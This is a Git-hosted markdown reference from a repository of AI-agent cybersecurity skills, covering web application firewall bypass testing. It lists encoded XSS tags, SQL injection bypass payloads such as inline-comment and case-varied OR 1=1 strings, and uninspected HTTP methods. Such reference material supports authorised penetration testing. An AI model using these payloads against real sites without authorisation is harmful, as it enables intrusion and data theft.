creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 05:34:55 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
d5f3fa32486ea335db802d68fe2147fa2da69583
Anthropic-Cybersecurity-Skills/skills/performing-web-application-firewall-bypass/references/api-reference.md
T
mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills 
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00

1.7 KiB
Raw Blame History

API Reference: WAF Bypass Testing

Encoding Bypass Techniques

Technique Example Description
URL Encoding %3Cscript%3E Single URL encode
Double Encoding %253Cscript%253E Double URL encode
Unicode/Fullwidth \uff1cscript\uff1e Unicode replacement
HTML Entities <script> Hex HTML entities
Null Byte %00 insertion Terminate string parsing
Tab/Newline scr\tipt Whitespace insertion

SQLi WAF Bypass Techniques

Technique Payload Pattern
Inline Comment 1'/**/OR/**/1=1--
Version Comment 1'/*!50000OR*/1=1--
Case Variation 1' oR 1=1--
Hex Encoding 0x313d31
Buffer Overflow Long padding before payload
Content-Type Switch Send as application/json

HTTP Method Bypass

Method WAF Behavior
GET/POST Usually inspected
PUT/PATCH/DELETE Often not inspected
OPTIONS Typically bypasses rules

WAF Detection Indicators

Response Meaning
403 Forbidden Request blocked by WAF
406 Not Acceptable Content rejected
429 Too Many Requests Rate limited
Custom error page WAF vendor-specific block

Python Libraries

Library Version Purpose
requests >=2.28 HTTP request sending
urllib.parse stdlib URL encoding/double encoding

References

Reference in New Issue View Git Blame Copy Permalink